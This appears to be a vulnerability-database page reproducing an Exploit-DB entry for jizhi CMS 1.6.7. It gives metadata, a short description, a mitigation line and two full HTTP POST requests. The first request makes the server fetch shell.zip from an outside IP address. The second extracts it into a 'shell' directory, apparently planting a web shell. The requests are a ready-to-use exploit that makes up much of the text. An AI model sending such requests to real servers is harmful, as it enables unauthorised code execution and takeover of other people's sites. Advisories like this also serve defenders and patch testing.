jizhi CMS 1.6.7 - Arbitrary File Download

vendor:

jizhi CMS

by:

iej1ctk1g

7.5

CVSS

HIGH

Arbitrary File Download

434

CWE

Product Name: jizhi CMS

Affected Version From: 1.6.7

Affected Version To: 1.6.7

Patch Exists: YES

Related CWE: N/A

CPE: a:jizhicms:jizhi_cms

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Mac OS

2020

jizhi CMS 1.6.7 – Arbitrary File Download

jizhi CMS 1.6.7 is vulnerable to an arbitrary file download vulnerability. An attacker can send a specially crafted HTTP request to the vulnerable server to download arbitrary files from the server. This vulnerability can be exploited by sending a POST request to the /admin.php/Plugins/update.html endpoint with the action parameter set to start-download and the filepath parameter set to shell. The download_url parameter can then be set to the URL of the malicious file to be downloaded. An attacker can also send a POST request to the /admin.php/Plugins/update.html endpoint with the action parameter set to file-upzip and the filepath parameter set to shell to unzip the malicious file.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of jizhi CMS.

Source

Exploit-DB raw data:

# Exploit Title: jizhi CMS 1.6.7 - Arbitrary File Download
# Google Dork: jizhicms
# Date: 2020-04-18
# Exploit Author: iej1ctk1g
# Vendor Homepage: https://www.jizhicms.cn/
# Software Link: http://down.jizhicms.cn/jizhicms_Beta1.6.7.zip
# Version: 1.6.7
# Tested on： Mac OS
# CVE : N/A

Data 1.

POST /admin.php/Plugins/update.html HTTP/1.1
Host: 192.168.1.253:8888
Content-Length: 86
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.253:8888
Referer: http://192.168.1.253:8888/admin.php/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09
Connection: close

action=start-download&filepath=shell&download_url=http://39.105.143.130:9090/shell.zip


Data 2.

POST /admin.php/Plugins/update.html HTTP/1.1
Host: 192.168.1.253:8888
Content-Length: 32
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.253:8888
Referer: http://192.168.1.253:8888/admin.php/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09
Connection: close

action=file-upzip&filepath=shell